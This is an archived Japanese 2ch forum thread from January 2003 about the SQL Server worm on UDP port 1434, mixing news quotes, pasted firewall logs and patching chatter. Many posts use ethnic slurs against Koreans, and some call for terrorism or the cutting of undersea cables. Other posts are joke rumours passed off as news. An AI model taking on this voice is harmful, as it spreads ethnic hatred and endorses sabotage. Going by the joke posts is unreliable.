【続報】ネット接続障害は新種「ワーム」が攻撃、世界的混乱狙う

世界各地で２５日発生したネットトラブルは、新種の「ワーム」と呼ばれる
自己複製するソフトが各ネットワークのコンピューターを攻撃し、回線が
混乱したためとみられる。同様のワームによる被害は一昨年９月１１日の
米国同時多発テロ直後にも発生し、何者かが世界的なインターネットの
混乱を狙ったとみられる。

インターネットのセキュリティー監視会社「ラック」によると、日本国内の一部
の企業で大量のデータが外部からコンピューターに送り付けられ、ネットワ
ークアクセスができなくなった。ネットワーク関係者によると、午後２時すぎ
から、中国向けのサーバーへのアクセスが不能になった。

コンピューターウィルス対策ソフトメーカー「シマンテック」によると、新種の
「ワーム」はマイクロソフト社製のデータベース管理ソフトの欠陥（セキュリー
ティーホール）から侵入し、自己複製を無限に繰り返して、ネットワークを
通じて移動し、接続されているサーバー、端末を次々に攻撃し、機能不能に
追い込んでいくという。マ社が欠陥対策に配布した修正プログラムを施して
いる場合には侵入されない。現在のところ、新種ワームによってデータや
システムが破壊されたとの報告はないという。

総務省インターネット戦略室は「緊急対応が必要という状況判断はしていない」
と話している。

引用元
http://www.mainichi.co.jp/news/flash/shakai/20030126k0000m040084000c.html

関連
【国際】韓国、ネットが全面まひ★２
http://news2.2ch.net/test/read.cgi/liveplus/1043482450/

依頼
420さん

2

にいーーーーーー

２

やーい５だ

>1　ｵｾｰﾖ

乙

>>2
必死だな（藁

結局
ハッカーは包茎だったのか？

知識がないのでこれぐらいしか書き込めん。

10くらい

漏れの股間がポートアタックに晒されていまつ！（はぁと

5?

２

ほほう
やはりそうでしたか

なんだぁ　テロじゃないのね

しかし、混乱したのは
自称IT先進国のみ

>>9
ﾜﾗﾀ

Linaxにしとけって

結局大混乱したのは韓国だけｗ

韓国のせいで被害が大きくなるわけだが

21時30分頃から1434アタックが止まりますた。

ふむふむ

ねぇマカーは大丈夫なの？

NHKラジオニュース
トップです

さすが自称IT先進国

　　ま　　た　　韓　　国　　じゃ　　！

で、この攻撃に負けたのは自称ＩＴ国家韓国か・・・

初めてＩＴで国を滅ぼす国家になるかも。

僕の肛門にアタックしないでください。

けつが痛いです

細かいことはよく分からないのでレンタルDVDを返しに行った方がよさそうだな

うひょー
偶然にも９をＧＥＴてしまった、
こんなの初めて。

Jan 25 10:49:37 gateway kernel: Packet log: input DENY ppp0 PROTO=6 62.26.211.28:33595 61.122.71.219:21 L=60 S=0x00 I=61446 F=0x4000 T=50 SYN (#2)
Jan 25 10:53:26 gateway kernel: Packet log: input DENY ppp0 PROTO=6 61.42.239.160:1620 61.122.71.219:80 L=48 S=0x00 I=56359 F=0x4000 T=113 SYN (#2)
Jan 25 10:53:29 gateway kernel: Packet log: input DENY ppp0 PROTO=6 61.42.239.160:1620 61.122.71.219:80 L=48 S=0x00 I=56877 F=0x4000 T=113 SYN (#2)
Jan 25 10:58:02 gateway kernel: Packet log: input DENY ppp0 PROTO=17 217.134.203.43:1029 61.122.71.219:137 L=78 S=0x00 I=49096 F=0x0000 T=110 (#1)
Jan 25 12:10:13 gateway kernel: Packet log: input DENY ppp0 PROTO=17 218.233.231.37:1028 61.122.71.219:137 L=78 S=0x00 I=62968 F=0x0000 T=115 (#1)
Jan 25 13:26:27 gateway kernel: Packet log: input DENY ppp0 PROTO=17 131.164.119.120:1025 61.122.71.219:137 L=78 S=0x00 I=12359 F=0x0000 T=111 (#1)
Jan 25 13:57:57 gateway kernel: Packet log: input DENY ppp0 PROTO=17 61.11.18.180:10054 61.122.71.219:137 L=78 S=0x00 I=30542 F=0x0000 T=114 (#1)
Jan 25 14:11:34 gateway kernel: Packet log: input DENY ppp0 PROTO=17 172.20.120.15:1028 61.122.71.219:137 L=78 S=0x00 I=43463 F=0x0000 T=110 (#1)
Jan 25 14:19:37 gateway kernel: Packet log: input DENY ppp0 PROTO=6 61.138.100.82:4480 61.122.71.219:80 L=48 S=0x00 I=9317 F=0x4000 T=113 SYN (#2)
Jan 25 14:19:41 gateway kernel: Packet log: input DENY ppp0 PROTO=6 61.138.100.82:4480 61.122.71.219:80 L=48 S=0x00 I=9619 F=0x4000 T=113 SYN (#2)

>日本国内の一部の企業で大量のデータが外部からコンピューターに
>送り付けられ、ネットワークアクセスができなくなった。
>ネットワーク関係者によると、午後２時すぎ
>から、中国向けのサーバーへのアクセスが不能になった。

やっぱり日本のネチズンの攻撃ﾆﾀﾞ！！
日本に謝罪と賠償を（略

韓国から世界に繋がる太い回線は日本との間なのだから
臨機応変に切断できるようにしないと日本が非難を浴びる。

>>23
FWやルータがなく、グローバルIPで直結の場合、ウイソもマカーも
アタックは受ける。
SQL鯖を入れてない限り、どっちも感染はしない。

よその国の文化や技術を自分達が作ったとはったりを言う韓国にバチがあたりました

総務省やばいんでねーのかい？

これも関連スレ
http://news2.2ch.net/test/read.cgi/newsplus/1043487529/l50

山崎渉(＾＾）の仕業ですね

>>31
自分のIPまで晒すなよ。

うちの会社ネットワークから切り離された状態だけどSQL鯖つかってんだよね・・・
どうしよう。

日本はどこかのんびりしすぎ。

＞マ社が欠陥対策に配布した修正プログラムを施して
＞いる場合には侵入されない。

マ社ってどこだよ。前触れも無く突然略すな・・。

つーか、漏れのブラックアイス無反応なんだが・・・

(＾＾）

このワームで釣りするか

総務省も駄目だな…危機意識薄すぎ。これだから日本は

つーか、漏れのブラックアイス無反応なんだが・・・

>>40
外部に繋がって無いなら慌てる必要は無い。
月曜にパッチ当てとけ。

ｗｉｎは危険というのは分かっているがＬｉｎｕｘにすれば
安全なのか？

パッチすら当てれない腐れチンカスが鯖管理してるからだろ
アホ運用はアホのまま氏ね

総務省にインターネット戦略室なんてないぞ！！
http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=%E7%B7%8F%E5%8B%99%E7%9C%81%E3%80%80%E3%82%A4%E3%83%B3%E3%82%BF%E3%83%BC%E3%83%8D%E3%83%83%E3%83%88%E6%88%A6%E7%95%A5%E5%AE%A4&lr=

姦鯖だけ相手のアタックだったら「はかー」でもよいと思っていたのだが・・・

jsdf-erai.shacknet.nuの仕業ですね。

修正プログラムはコピー品では落とせないんですよね。
韓国もう駄目です。

>>40
パッチあてれ。それで終了。

結局ワームか。なんというか、普通だった

ひょっとしてただ単に世界中が韓国経由をすべてブロックしただけだったりして。

あとkrメールが自動返信で大量に返って来たとか？

>>50
パッチの当たってないものはWinでもLinでも同じ。

msn.comで接続できないよ
今hotmailで接続している

スコッティ2ホッティ

>>57
とりあえず何がひょっとしてなのか教えてくれ

想像だけど、ＳＱＬサーバがＵＤＰポートをみてて、
バッファオーバーランでハッカーが任意のプログラムを送りつけ実行させることのできる
脆弱性があったと思う。
従って、攻撃→ウィルス送り込み→感染→他サーバ攻撃というのが、今回の騒動らしい。

バッチすら当てられない鯖管理者ってほんとにいるの？

「シコタホア」の意味が分かった！

「シコタホア、ー�y」「タ・ロシコー・80％」「30ククソ・タ衂ミアンタヌヌ・ナ
テ！！」──毎日どっさり届くうわごとメールに悩まされているユーザ
ーも多いだろう。彼らは何を言わんと欲しているのか？　調べてみた。

http://www.zdnet.co.jp/news/0210/25/njbt_08.html

21:48:28.309816 backoffice.nexon.co.jp.4285 > ****.****.ne.jp.1434: udp 376

日本企業かと思ったら韓国企業だったよ。
しかしベタなホスト名をつけてるな。

結局パニクったのは韓国だけ？

>>47
yarareteyannno

(＾＾）

今からパッチ当てられるの？

>同様のワームによる被害は一昨年９月１１日の米国同時多発テロ直後にも発生し

これはちょっと初耳。
単にアクセスが集中したのとは違うのか・・

>>42
＞マイクロソフト社製のデータベース管理ソフトの欠陥（セキュリー
ティーホール）から侵入し、自己複製を無限に繰り返して、ネットワークを
通じて移動し、接続されているサーバー、端末を次々に攻撃し、機能不能に
追い込んでいくという。
＞マ社が

>>63
社長とかに「お前やれ」って感じでやらされている人はそうなんじゃないの？

エライ

仮説が正しければ、ＳＱＬサーバいれてなければ、おそらく問題ないはず。

>>70
CodeRedのことだと思われ。

2003年1月25日 21:54:55 Unrecognized access from 202.161.165.84:4839 to UDP port 1434
2003年1月25日 21:59:32 Unrecognized access from 202.139.89.73:1190 to UDP port 1434
2003年1月25日 22:02:02 Unrecognized access from 80.82.188.72:1027 to UDP port 137
2003年1月25日 22:05:10 Unrecognized access from 64.86.47.220:1025 to UDP port 137

ケアレス・ウィスパー

>>63
実在する。

アルカイダが犯行声明を発表。（共同）

>>74
直接的な被害は無いが
ネットワークトラフィックが増大するので間接的には被害あるかも。

IT先進国

http://www.security.nl/
http://www.security.nl/misc/codered-stats/geodist.gif

>>79
アホカイナ

いつこれ治まる？
3attack / 1min

>>79
嘘はやめれ

>>18
？？？？？

ま、俺にとっては表示が遅くなるのとログに1434が大量に残るだけで何の影響も無いってこった

>>73
パッチ当てに大量ダウンロードしたら
『電話代が高い』と社長から小言が
前任者がとろすぎるんじゃい！

ちなみにその会社、今では破産寸前です。むべなるかな

韓国はなぜ不通になったんだ？

>>64
ﾜﾗﾀ<丶｀∀´>

JCBもシステムエラーで止まったぞ。

>>85
ネタだって。
【富士通・インテル、汎用機並み性能の次世代Linax鯖開発。】
http://news2.2ch.net/test/read.cgi/newsplus/1043391684/

＞総務省インターネット戦略室は「緊急対応が必要という状況判断はしていない」
でもＩＴ先進国はマヒしちゃったの？なんでだろ
橋とかビルといっしょか？

　チ　ョ　ン　に　Ｉ　Ｔ　は　ム　リ

>>88
用も無いのにSQLサーバをインストールしているやつが多かったんだろ

いずれはIT犯罪で死刑判決が出る日が来るかも？

port137についても、通常、よく叩かれるポートなので、
それほど問題ないと思う。

>>74
間接的な被害は確かに・・
もしＳＱＬサーバと同じＬＡＮ内に共有かけてるマシンがある場合、
ひょっとしたらネットワークドライブ等の共有で、
ｈｔｔｐｄまで逝ってる可能性はあるわな・・・

感染防止のために、しばらく繋がない方がいいのかなぁ？

うちは３０分間で６０件のアタックを受けていた。
これは新記録だな〜。

SQLの試験が近いのと関係があるのかもしれん

100ﾆﾀﾞ

妙なパケがウザイな

>>98
なんでそんなに来るんだ？
うちは30分で10件程度しかこないぞ

MSNメッセンジャーも使えないのもこれか？

総務省インターネット戦略室って
こういう事態の時に何もしないんだったら
何のために存在してんだYO！！

>>98
うちは夕方頃、1番多い時で5attack/minだたよ…。

作業場所：米国ISP(Verio)向け通信、JPIX向け通信
開始日時：平成15年01月25日（土 ） 20時15分
作業内容：米国ISP(Verio)、JPIX向け通信へのUDPポート番号1434のフィルタ適用
影響範囲：米国ISP(Verio)、JPIXとのUDPポート番号1434を利用した通信

だってさ

>>105
うちとほぼ同じだ。

>>41
まー島国だから

>>99
セキュリティホールほﾊｹｰﾝしたら合格でつか？

コード・レッド・・・・・・・・・あんたねぇ

詳しい事は解からんが、うちのPC何かを送信してる。。
一旦切った方がいいのか？

韓国、日本、タイ、カンボジアで被害報告だそうだ。

他の国はどうなっているんだ？

>>87
うちはその回線すらないんですが。

>>111
どのポートにアクセスしてるんだ？

どのポートがどのIPから叩かれているか分かりますか？

>>102
人柄がいい人のとこにはたくさんアタックが来るんだよ。
これネットの常識。

>>102
Nimda（だっけ？）のパターンだと、最上位の１６ビット＋ランダムの下位アドレス
に仕掛けていたように、何かしらのパターンで攻撃しかけてるとしたら、
偏りがあるはず。

>>114
どうやって見ればいい？XPなんだが、イマイチ解からん。

なんだかネットに繋ぎにくくて
繋がってもブチブチ接続が切れるんだが
これも何かに影響されてるって事？

そういう原因を調べるソフトがあったら欲すぃ…。

うちの会社、
ネットは外部プロバイダ契約で、光ファイバーなんだけど、
贅沢にもLAN内に会計ソフトのためだけにWin2kのサーバー機があります。
(サーバーは単にLANの中の一台に過ぎない)
それで、SQLサーバっていうソフトみたいなのがスタートアップで
起動しているが、こういう場合もやばいの？

>>104
日本の対策室とか委員会というヤシと同じ。
名ばかりの飾り物なのでは？ｗ

>63
「パッチあてて再起動して、元のように動かなくなったら怖いから」という理由で
サービスパックしか入れないところもありますが、何か?

彼女のセキュリティーホールでさえやヴぁいのに

>>118
スタートメニューのプログラム→コマンドプロンプトを開いて、
netstat
で判る。

>>120
おそらく問題なし。外部から、そのＳＱＬサーバにアクセスできないはず。

チョンには良い薬だろ、いつも他の国にサイバーテロ仕掛けている
くらいだから。

>>117
なるほど、そうかもしれないな。

つーか、セキュリティソフトつけてないやつが結構いる。

韓国よりも日本の心配をした方がいいだろう。

＜ネット接続障害＞ウイルスで世界的被害　コード・レッド以来

　【ワシントン斗ケ沢秀俊】世界各地で米東部時間２５日午前（日本時間同日午後）、
インターネットへの接続ができなくなるなどのコンピューター被害が相次いだ。
コンピューターウイルスによる影響とみられており、米国の専門家は０１年夏に世界
的な被害を出したウイルス「コード・レッド」以来の大規模な被害になる可能性があ
るとみている。

　被害は世界各地で一斉に始まった。アジアでは韓国、日本、タイ、カンボジアなど
で障害が報告されている。専門家の調査によると、コンピューターのサーバーが攻撃
されたとみられる。インターネットに接続できなくなったり、作動が遅くなるほか、
ＡＤＳＬ（非対称デジタル加入者線）サービスにも影響が出ている。被害はさらに広
がる見通しだ。

　ＡＰ通信によると、コンピューターウイルスの専門家のマーク・マイフレット氏は
「コード・レッドによく似たウイルスだ」と話している。（毎日新聞）
[1月25日21時56分更新]

http://headlines.yahoo.co.jp/hl?a=20030126-00000079-mai-soci

>>125
ありがとう。
確かにそのサーバーが外部との入り口では全く無いからね。

http://zdsearch.zdnet.co.jp/?idxname=news&query=spida&sort=scorequot%3B&whence=0&max=10&result=normal
これの進化型ちゅーことかｗ

>>120
病気持ちのコンピュータがそのLANにつなげられた瞬間、あなたの会社は終わりだよ。
W2K鯖にはしばらく氏んでてもらった方がよろしかろう。

ほほほほ

oyster6.he.net
ってとこ？
順番にポート番号が１２１２〜

韓国を狙ってテロしてくれればなにもいうことなし。
もっとやってくれーーーーーーーーーー

ホントは電気代の滞納で停電とかそんなんだろ？

漏れへの攻撃は止めれ

パッチって履くものじゃないのか？

昼間某局で韓国のITはすごいとかやってたけど
その時間帯に韓国の全ての鯖がダウンとは
いかにテレビがいい加減かがよくわかったよ

>>135
それ２ちゃんねる

作った奴は今頃、天にも昇る気分だろうな。

全世界を自分のスキルで混乱させてるんだから・・・・ちょっと羨ましい。

要は中国や韓国は無断複製でインスコしてるから
セキュリティーのアップデートしてないんだろ？

>>133

そのサーバーにはサーバープロテクトなどのウイルス対策ソフト
入っているだろ、当然。当然、毎時パターンファイルアップデートしてるだろ。
問題ないよ。

俺のチンポも麻痺してきた

総合すると、韓国ではＳＱＬサーバを外部にさらしていて、
しかもセキュリティに関してもほとんど無関心であったため、
仕様帯域が一気に増え、基幹が逝ってしまったということか・・

>>133
なんですとぉ〜
病気持ちの端末なんていくらでも出てくる可能性ありだ！
ファイアーウォールとかルータの設定みんな外部業者任せだし。
こりゃサーバーのLANケーブル抜いとくか。

漏れのﾌｧｲﾔｰｦｰﾙはぴくりとも反応せん

なんだか(´・ω・`)ｼｮﾎﾞｰﾝ

>>148　名に使ってんの？

韓国の鯖はMS SQL

まさにIT先進国は砂上の城だな

>>148　
　おまえ、ルータの内側にいないか？

要するにポート1434にDOS攻撃？を加える新種のワームが
日本のどっかのISPのDNSに攻撃してきた
で、その攻撃元がお隣の韓国だったと
その韓国は完全麻痺で混乱状態

>>147
パッチ当ててなけりゃすでに感染→撒き散らしてるカモナー

>>148
脳豚？

つまり、IT先進国はセキュリティが甘かったということでつね。
夕方放送したテレ東のIT先進国韓国マンセー番組は
どーするんだろーね？

今回も被害を>>81みたいに示したら、また朝鮮半島が赤丸で見えなくなっちゃうのかねえ。(w

韓国のＳＩなんか怖くて取引できないな。

今、ＰＣの壁紙見たら張ってなかったのにＮＨＫのニュース画像が壁紙になってなｗ
なんだなんかやられたかｗ

セキュリティホールを突いてコンピュータシステムをサービス不能に陥れる、
DoS（Denial of Service）アタックと呼ばれるクラッキングが知られているが、
最近これと似て非なる「ドス・アタック」という危険な技があみ出された。

これは、「鉄砲玉」と呼ばれる命知らずが、対立サイトのサーバマシンの
フロッピー・ディスク・ドライブに MS-DOS のシステムディスクを突き刺し、
イジェクトボタンをむしり取ってからリセットボタンを押してくるという荒技で、
ターゲットにされたサーバは、MS-DOS 専用マシンになってしまうという。

最近この攻撃を受けたサーバ管理者のひとりは、
「Xeon　2GHz で動く DOS は悪夢のように速かった……」と、
未だ茫然自失状態を脱していない。

SQL狙いてーのは、いいとこ突いてるよな。
この手の鯖だと上りの速い回線使ってたりするから。

>>155
途中でお笑い番組に変わったって本当？

>>152
ちがーう
韓国のＳＱＬサーバのほとんどにセキュリティパッチがあたってなくて感染。
ブロードバンド使用者が多いこともあり、使用帯域が急上昇し、
基幹系があぼーんだとおもふ。

>>159
ﾜﾗﾀ ｺﾜﾋ

>>152
自分のもった毒を飲んじゃったわけですな

>>144
そんな事全然してませんYO〜
今まで共同の端末で会計ソフトに入力。
↓
各個人の端末から入力したい。
↓
それにはサーバー機を買わなきゃいけない。
↓
買おう。
↓
とりあえず説明書読みながら会計ソフトの環境は出来た。よかった。終わり。

こんな感じだし。

>>159
ｺﾋﾟﾍﾟだろうがﾜﾗﾀ

うちもノートンだけど、全く反応無し。
nyを使えるようにしてるからかな。

MSのパチもの殲滅作戦ですか?

>>151
>>148は、パーソナルファイヤーウォールのことを言ってるんじゃないか？

>>159

最高！

ノートソ先生でつ

TBSｷﾀーーーーーーーーーーーーーーー

>>169
フィルタリングしているルータの中のＰＣにパーソナルファイアーウォールをいれてる罠

>>165
中小企業だとそういうところ少なくないよな

日本側の対応!?
http://headlines.yahoo.co.jp/hl?a=20030125-00000702-jij-soci

ニュース

相変わらずマスゴミは韓国の脆弱性を隠してるような報道しかしてませんな

ニュースしてる

鯖に当たった

ＴＢＳｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━!!

ってか今のキャプチャした奴いるか？

むこうのネットカフェのPC WinMX入ってたぞ

TBS(´･ω･`)ｼｮﾎﾞｰﾝ

>>165
あ、それネットワーク感染型のワームが入ったら、地獄見るパターンだ。

>180
一瞬だったぞ！？w

>>177
さぱーり意味わからずに放送してるんだよきっと

今こそ記念カキコ

まるで韓国を狙ったサイバーテロのように報道してましたね。





韓国が日本を狙い損ねたんじゃねーの？

ブロードキャスター
小泉「たいしたことない」

>>182
今回のウィルスに関しては、たぶんだいじょぶ。
ただし、メール等、ネットワーク感染するのがきたら
ＬＡＮ内すべていってしまいますな

>>161
ネットにつなぎながら見てればお笑い番組以上ﾀﾞﾀｰﾖ。

>パッチすら当てれない腐れチンカスが鯖管理してるからだろ
当てたくても当てられん。NTルーター上の「MicroSoft WinSockProxy」が
動作しなくなるからパッチ使えん。
ネットワーク再構築したいがPCがレトロNEC、予算も降りない。もうしらん。
ソフトも使わん鯖に不要なウイルス対策ソフトは入れてくれるが、
ワーム対策パッチの必要性を理解しようとしてくれん。

いわずもがなだが、BIOSで起動順は変更できるがな…。

これはあれか？
韓国が爆発的に増やしちゃったってわけか？

>>173
それは、>>148に言ってやれ

ＩＴ革命・韓国を行く 2003年1月25日　16:30〜17:15　テレビ東京

「地獄をみた経済、急回復の秘密は」[出]生島ヒロシ　

わははははっ、ははははは！！！

ヘタレハッカー、かかってこいよ！！！
ほら！！！ホラホラ！！！！！！！

韓国史上初のインターネット完全麻痺


[マネートゥディ]韓国のインターネットが全面麻痺される史上初の事態が発生し
た。これによってインターネットバンキングなどインターネットビジネスがサービス
不可の状態になっており、通信販売業者及びインターネットで営業をしている
企業等の相当な被害が予想される。

25日通信業界によれば午後2時30分頃以後韓国のインターネットが全面麻痺された。
コリアンテレコム恵化電話局のドメインネームサーバ(DNS)がトラフィックを
阻むために自動遮断になりながら他のDNSのトラフィック増大を誘発、連鎖的にイ
ンターネットが麻痺状態になったと推定される。

◇事件原因は

今日の午後発生したインターネット接続の麻痺はハッカー攻撃によるものである
との専門家たちの見解が続いている。
インターネットセキュリティー専門家たちによれば、今回のインターネット麻痺
に対して 「アメリカなど一部国家でも、似たようなハッキングを受けていた」
「サーバが特別な理由のなくトラフィックが急増するようにするいわゆる `分散
サービス拒否攻撃(DDoS)'によることである確率が高い」と明らかにした。専門家
たちは特に 「今回のハッキングは個人がやったものではなく、ハッキング
グループが専用ツールを共有して集団的に攻撃したようにも見える」とも付け
加えた。

>>173
いや、ルータ入れてない
危ないのは承知の上……

ま、いいや。危なくないに越したことはない

>>165
ウチの会社も同様のパターンでつが、家にパソコン持ってるのが
漏れだけなので（ｗ
しかもモデムもなにも繋がっていないという罠。

>>171
あはは・・・

200

今みたけど、1434はなかった。

>>194
自己破産のことは報道してました？

(続き)

またコリアンテレコム関係者も今回の事態原因と関連して「通常1秒あたり1000か
ら2000回程のアクセス数が今日の午後2時以後には1秒あたり3万〜4万回までに
膨れ上がり麻痺が起きた」と明らかにしており、ハッカー攻撃説を裏付けてくれ
ている。

今回の事態原因は、ハッカーたちの所作という主張が占めているが、セキュリティ
の不備や事故対応の必要性も指摘されている。あるインターネットセキュリティ
の専門家は 「現在国内にはハッカーたちの分散サービス拒否攻撃を遮断すること
ができる装備や技術がかなり不足しているのが実情」と言っている。そのため
「第2の事態を阻むために、速やかにネットワーク専門家とセキュリティー専門家
との間の研究を進める対策の準備が必要だ」と指摘している。

漏れのＡＵの携帯（東芝）も
昨日から全然メールやWebがつながらないが
これも関係あるのかな？
（もちろん電話は問題なし）

>>165
悪いけど、状況は真っ暗だな。業者のいいカモだよ。

F5攻撃を得意とするくせに、防御に回るとからっきしだなﾜﾗ

ほんとは、企業で各クライアントがパーソナルファイヤーウォールを入れるは関心しない

何が起きているかわからない奴は以下を見ればわかる

ポート1434にアタックがいっぱい来た方へ
ttp://gigazine.net/News/html/lg/000854.htm

ネチズン達の間では反米デモの報復だと声を荒げるものがいる。
といいな。

月曜日に出社したらワーム蔓延ということもあるのかな・・・

以上、
http://www.moneytoday.co.kr/news/view/2003012519164600065.html
を翻訳しました。

ＩＴ革命・韓国を行く 2003年1月25日　16:30〜17:15　テレビ東京

「地獄をみたIT、急転落の秘密は」　

コリァ酷いインターネットですねｗｗｗ

うちのADSL、いつも1MBPSくらいしか出ないのはこれのせいだったのか！！(｀･ω･´)

>>213
（　´д）ﾋｿ（´д｀）ﾋｿ（д｀ ）

もう通信ログは貼らなくてもいいから

>>206
「攻めれば将軍、守れば足軽」ってヤツだな(w

また韓国なのか？

コードレッドで懲りてなかったのか…

>>196
韓国は自分たちの技術＆危機意識の無さをハッカーに責任転嫁しようとしている
ということでよろしいですか？

もう重過ぎ。一般サイトが表示されない

>>208
最後の2行にﾜﾛﾀ

>> 同庁(警察庁)は職員をセンターに待機させ、
>> インフラ関連企業などから被害対策などの要請があれば出動できる態勢を整えた。
>
> 出動して…何をしてくれるんですか？
> 画面をいっしょに眺めるとか？（違う）

やっぱり週末に狙うのか

>>217
すげー、1Mbじゃなくて1MB？
そりゃ、速いね

あー、お隣のIT強国にはパッチをこまめに当てるような役に立つヲタは、いないのですか？

韓国がやられれば一番疑われるのは北だよな。
アルカイダより北説に２００００ゲイツ。
さらに、この説を踏まえて北と韓国を離反させたい勢力が
ワームを撒き散らしたに200000000ゲイツ。

SQLServerのpatchって誰でも手に入るじゃん。
どうせコピーばっかなんだろうけど、これぐらいやっとけよ。

インターネットデモだったのでつか？

ここまで大きくなるとは………

正直すまんかった。

>>227
そんなかんじのデモです

関係ないけどtcp6003って来てない？
210.166.236.67なんだけど

>>219
いや、韓国はPCソフトのピーコ天国だから、正式なサポートが
受けられないというのが正しいのかもね・・・。

サーバーが完全にダウンし、復旧は不可能。（聯合ニュース速報）

ＫＤＤＩはシステムが朝鮮製で今トラブってるってどっかで見たぞ

鯖管理者なら、穴ぐらいふさいどけ！
馬鹿どもが。

>>167
ノートンのファイヤウォール　→　不正進入保護　→　ポートスキャン試行を検出

と

ノートンのファイヤウォール　→　ファイヤウォールの設定　→　カスタム　→
未使用のポートアクセス時に警告

をONにしたら激しく反応しまくってるよ。働き者だよこいつ。

ttp://www.iana.org/assignments/port-numbers

>>202
たぶんやってなかったと思う。
NAVER見ながらテレ東みてたからわからんけど。
ﾈﾁｽﾞﾝはパニック状態ですた。
番組内では
「リストラで各企業が4割人員削減したんで韓国は景気がいいんです。
日本にマネできますか？ハッハッハ。」とか、
「日本もIT先進国韓国を見習ったらどうですか？」
みたいな事言ってた。
ギャップが激しすぎて大笑いさせてもらいますた。

>>225
韓国在住の知り合いのメールだと、すでに日本のせいになっているよ。
もうすぐ日本政府に謝罪と賠償を要求するんじゃない？

>>230
ZDNETじゃん

韓国がこのまま復旧のめどが立たないように心の底から願っています

>>238
北━━━━(ﾟ∀ﾟ)━━━━!!

だからMSSQLからの攻撃が多いのか

【前から】

(-＿-)　(-＿-)　(-＿-)　(-＿-)　(-＿-)　(-＿-)　(-＿-)
(∩∩)　(∩∩)　(∩∩)　(∩∩)　(∩∩)　(∩∩)　(∩∩)


【後ろから】

(||||.|||)　(||||.|||).　(||||.|||)　(||||.|||).　(||||.|||)　(||||.|||)　(||||.|||)
(　 * .)　(　 * .)　(　 * .)　(　 * .)　(　 * .)　(　 * .)　(　 * .)
　　|__________|__________|__________|__________|_________|_________|
　　　　　　<<ワームケツプラグネット接続中>>

無謀にもSQL Serverなんて業務に使ってるところは、
クライアントもほとんどがIEやOutlookを「生」のまま使ってるんじゃねーの?

もうね、バカかと、アフォかと。

さすが韓国！

ア
ニ
ョ
ハ
セ
ヨ
｜
。

こーなったら海底ケーブルちょん切ってやる

　大体、チョン公はどいつもこいつも無保証の割れ物使っているから、あっさり
安全の穴を攻められるんだよな。ＩＭＦ支配(＝国家倒産)した身なんだから、身
の丈考えてＩＴ立国などと大それたことを考えなければ良かったんだよ。お蔭で
日本も飛んだとばっちりだった罠。

復旧援助でひと儲けできないかと
にやにやしながら頭をひねっている政治家多数と見た。

>>239
なんなんだろ？
まあ別にいいんだけど

本当に韓国が日本に何か言ってきたら海底ケーブルぶった切ってやれ

>>238
ネタですか？

>>237
あの番組HYUNDAI特集したりとってもあやすぃんだが

しかも割れもんなんでしょ？

ZONEALARMじゃだめ？

こういうのを「脆弱」っていうんだね。

今がチャンスだぞ、対馬の海底ケーブル＞北の工作員

マジ　あの国に文明持たせないほうがいいんじゃないだろうか・・・・・。

>>252
ﾈﾀ━━━━(ﾟ∀ﾟ)━━━━!! ｶ?

明日の取引中止を決定。ネット取引復旧見通し立たず（聯合ニュース速報）

>>235
167ですが、未使用のポートアクセス時に警告にチェックが入っていなかった
のでそのせいかもしれません。

現在は収まっているのでしょうか？

でも海底ケーブルって日本が金出したんだろ？
座れるのは割ればっかりだがな

>>260
それマジなの？
前スレでも銀行取引が停止とか言ってたけど。

>>253
テレ東ってふだん、エバラの韓国風ナントカのたればっか宣伝流してるよな

日本にも来たね・・・
エア−エッジ＋ＤＩＯＮではまだつながるが・・・

韓国完全麻痺だったの？

今ごろ韓国人は頭から湯気が出てるんだろうな

今日はやたら重くて、ヤフーとかにもなかなか繋がらないし、とにかく
激重だったけど、原因はこれか？。

>>248
大
安
の
日

>>261
今は両方ONにしてもほとんど無いよ。2、30分に1回あるかどうか。
夕方頃はまじひどかった…分間3、4回あたりまえだったよ。

明日の株がたのしみ〜〜〜

北ちょんかイラクの仕業だな。
北ちょんの可能性が高いが。

http://support.gmo.jp/announce/trouble/members.php?837
インターＱもやられた。インターＱの鯖はチョンにあるのか？

もう収まった？
漏れのところには来なくなりますた。

>>261
今は反応なし。
１９〜２１時あたりがウザかった

もしかして大変なことが起こりつつある？？？？？？

http://wtc.trendmicro.com/japanese/wmap.asp

皆さんこれ見れますか
ちなみにどれんどマイクロのウイルスのリアルタイムマップです

>>271
日曜ですが。

>>263
たまに居る電車内のキチガイと同じ

>>271

で、火元はやっぱりチョんか(´・ω・｀)？

リムネットPOP受信激重い。
これも影響なのか？

なんかルータのランプが点滅してるから調べてみてもログに引っかからない
フィルタをかけてなかったみたい
かけたら早くも2回ほどｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!

>>263
そいつを透明あぼーんにするように、大嘘吐きです。

>>202
してなかった。ただただマンセー。
IMF危機も、韓国のみの力で乗り切ったかのように言ってたと思う。
日本も韓国を見習って、とか論調のみ。
ウイルス関連もやってたような・・・それも誇らしげに。
まあ、あの番組のスポンサーが・・・

それにしても凄いタイミングだった。

で、こんな時にひろゆきは「人間はアリクイから進化した」
なんてスレ立ててるわけで・・・。

確かに、夕方、重かったな

>>260にも突っ込んでやれ。
日曜ですが。

読売新聞に繋がらんな
http://www.yomiuri.co.jp/

>>235
NIS2003使ってるんだけど、詳しい設定方法きぼん！

>>277
見れた。

＞マジ　あの国に文明持たせないほうがいいんじゃないだろうか・・・・・。
禿同。ついこないだまで女が乳出して歩いてた国だ。
文明に人間がまったく追いつけない。

>>289
つながるじゃねーか！

>>270
プロバとかが手動でトラフィック規制してるんじゃないかな。
シス管やＳＥの連中は大変だよな、大手プロバとかの

>>270
いま、連続できました。ｗ

これ、チェック入っていなかった時には乗っ取られ放題だったのでしょうか？
質問厨でｽﾏｿ。

こちら　未だに５分おきで来てますが

>>289
それは君だけだと思われｗ

NHK北〜〜〜

NHK見お

俺はMSNに繋がんねぇ〜

全27鯖 (･∀･)ｲｲ 0鯖　<丶｀∀´> ﾆﾀﾞ 27鯖 ｱｯﾋｬｯﾋｬ!ヽ(ﾟ∀ﾟ)ﾉ �d�j! �d�j!

水の目

>>290
上のオプション押して中に入ればあるよ

>>291
ありがと、
うちからだと画像が抜けてるんだよね（TT

>>２９５　おまいはＭＳ−ＳＱＬつかっとんのか？

>>270
ノートンのファイヤウォール　→　不正進入保護　→　ポートスキャン試行を検出
ってのが分からん。

下のは分かった・・・。

徹夜の皆さん、がんばりませう。。。

初心者なんで
ポートスキャンなんか
ぜんぜん気がつかなかった
わけだが

>>295
確認出さずに接続切りまくっていたと思われ

